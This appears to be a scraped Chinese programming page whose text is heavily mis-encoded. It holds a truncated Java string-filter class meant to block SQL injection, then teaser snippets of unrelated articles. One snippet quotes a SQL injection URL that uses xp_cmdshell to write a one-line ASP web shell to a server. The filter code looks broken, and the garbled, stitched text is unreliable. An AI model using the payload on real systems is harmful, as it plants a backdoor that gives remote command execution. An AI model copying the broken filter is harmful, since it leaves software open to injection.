JAVAÖзÀÖ¹SQL×¢Èë¹¥»÷ÀàµÄÔ´´úÂë
JAVA£×Ö·û´®¹ýÂËÀà
package cn.com.hbivt.util;
/**
* Title:
*
* Description:
*
* Copyright: Copyright (c) 2005
*
* Company:
*
* @author not attributable
* @version 1.0
*/
public class StringUtils {
//¹ýÂËͨ¹ýÒ³Ãæ±íµ¥Ìá½»µÄ×Ö·û
private static String[][] FilterChars={{"",">"},{" "," "},{"\"","""},{"&","&"},
{"/","/"},{"\\","\"},{"\n",""}};
//¹ýÂËͨ¹ýjavascript½Å±¾´¦Àí²¢Ìá½»µÄ×Ö·û
private static String[][] FilterScriptChars={{"\n","\'+\'\\n\'+\'"},
{"\r"," "},{"\\","\'+\'\\\\\'+\'"},
{"\'","\'+\'\\\'\'+\'"}}; /**
* ÓÃÌØÊâµÄ×Ö·ûÁ¬½Ó×Ö·û´®
* @param strings ÒªÁ¬½ÓµÄ×Ö·û´®Êý×é
&
Ïà¹ØÎĵµ£º
ÏÖÓÐtable_for_report_1ºÍtable_for_report_2£¬ÏêÇéÈçÏ£º
table_for_report_1ÓÐnum×ֶΣ¬c1,c2,c3×ֶΡ£
Êý¾ÝÈçÏ£º
num c1 c2 c3
1 15001346690 11 12 13
2 1 ......
×îÏêϸµÄSQL×¢ÈëÓï¾äÏà¹ØµÄÃüÁîÕûÀí
1¡¢ ÓÃ^תÒå×Ö·ûÀ´Ð´ASP(Ò»¾ä»°Ä¾Âí)ÎļþµÄ·½·¨:
http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';- ......
ʵÏÖСÊý¾ÝÁ¿ºÍº£Á¿Êý¾ÝµÄͨÓ÷ÖÒ³ÏÔʾ´æ´¢¹ý³Ì
¡¡¡¡½¨Á¢Ò»¸ö Web Ó¦Ó㬷ÖÒ³ä¯ÀÀ¹¦Äܱز»¿ÉÉÙ¡£Õâ¸öÎÊÌâÊÇÊý¾Ý¿â´¦ÀíÖÐÊ®·Ö³£¼ûµÄÎÊÌâ¡£¾µäµÄÊý¾Ý·ÖÒ³·½·¨ÊÇ:ADO ¼Í¼¼¯·ÖÒ³·¨£¬Ò²¾ÍÊÇÀûÓÃADO×Ô´øµÄ·ÖÒ³¹¦ÄÜ£¨ÀûÓÃÓα꣩À´ÊµÏÖ·ÖÒ³¡£µ«ÕâÖÖ·ÖÒ³·½·¨½öÊÊÓÃÓÚ½ÏСÊý¾ÝÁ¿µÄÇéÐΣ¬ÒòΪÓα걾ÉíÓÐȱµã£ºÓαêÊÇ´æ·ÅÔÚÄÚ´æÖУ¬ ......
Ò»¶Îʱ¼äÀ´£¬Ã¿ÌìµÄ¹¤×÷¶¼±È½ÏÔÓ£¬vb,asp,c#,sql£¬Ã¿Ï×÷¶¼Òª¸ã£¬ÊµÔÚÊÇÀÛ£¡¹¤×÷Ö®Ó࣬ÏëÏ빫˾ºÍ¹¤×÷µÄÇé¿ö£¬¿´À´ÊÇÓбØÒª»»¸ö»·¾³ÁË¡£²»¹ýÒ²ÒªÏÈ°ÑÄ¿Ç°µÄ¹¤×÷´¦ÀíÍê³É°¡¡£
×î½üÓÖÓöµ½Ò»¸öÎÊÌ⣺һ¼Ò¿Í»§Ê¹ÓÃÖеÄÊý¾Ý¿â£¬ÈÕÖ¾ÎļþÒì³£Ôö´ó£¬Æ½¾ùÿÌìÔö¼Ó´óÔ¼Ò»¸öG£¬¶øÊý¾ÝÎļþ±ä» ......
